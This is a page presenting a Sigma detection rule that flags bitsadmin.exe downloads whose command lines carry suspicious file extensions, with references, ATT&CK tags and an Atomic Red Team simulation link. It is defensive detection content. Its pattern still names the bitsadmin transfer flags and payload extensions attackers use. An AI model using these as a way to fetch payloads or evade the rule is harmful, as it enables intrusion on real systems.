File With Suspicious Extension Downloaded Via Bitsadmin

calendar Apr 28, 2026 · attack.persistence attack.execution attack.stealth attack.t1197 attack.s0190 attack.t1036.003 attack.command-and-control attack.t1105  ·
Share on: linkedin copy

Detects usage of bitsadmin downloading a file with a suspicious extension

Sigma rule (View on GitHub)

 1title: File With Suspicious Extension Downloaded Via Bitsadmin
 2id: 5b80a791-ad9b-4b75-bcc1-ad4e1e89c200
 3status: test
 4description: Detects usage of bitsadmin downloading a file with a suspicious extension
 5references:
 6    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
 7    - https://isc.sans.edu/diary/22264
 8    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
 9author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
10date: 2022-06-28
11modified: 2023-05-30
12tags:
13    - attack.persistence
14    - attack.execution
15    - attack.stealth
16    - attack.t1197
17    - attack.s0190
18    - attack.t1036.003
19    - attack.command-and-control
20    - attack.t1105
21logsource:
22    category: process_creation
23    product: windows
24detection:
25    selection_img:
26        - Image|endswith: '\bitsadmin.exe'
27        - OriginalFileName: 'bitsadmin.exe'
28    selection_flags:
29        CommandLine|contains:
30            - ' /transfer '
31            - ' /create '
32            - ' /addfile '
33    selection_extension:
34        CommandLine|contains:
35            - '.7z'
36            - '.asax'
37            - '.ashx'
38            - '.asmx'
39            - '.asp'
40            - '.aspx'
41            - '.bat'
42            - '.cfm'
43            - '.cgi'
44            - '.chm'
45            - '.cmd'
46            - '.dll'
47            - '.gif'
48            - '.jpeg'
49            - '.jpg'
50            - '.jsp'
51            - '.jspx'
52            - '.log'
53            - '.png'
54            - '.ps1'
55            - '.psm1'
56            - '.rar'
57            - '.scf'
58            - '.sct'
59            - '.txt'
60            - '.vbe'
61            - '.vbs'
62            - '.war'
63            - '.wsf'
64            - '.wsh'
65            - '.xll'
66            - '.zip'
67    condition: all of selection_*
68falsepositives:
69    - Unknown
70level: high
71regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions/info.yml
72simulation:
73    - type: atomic-red-team
74      name: Windows - BITSAdmin BITS Download
75      technique: T1105
76      atomic_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b

References

Related rules

to-top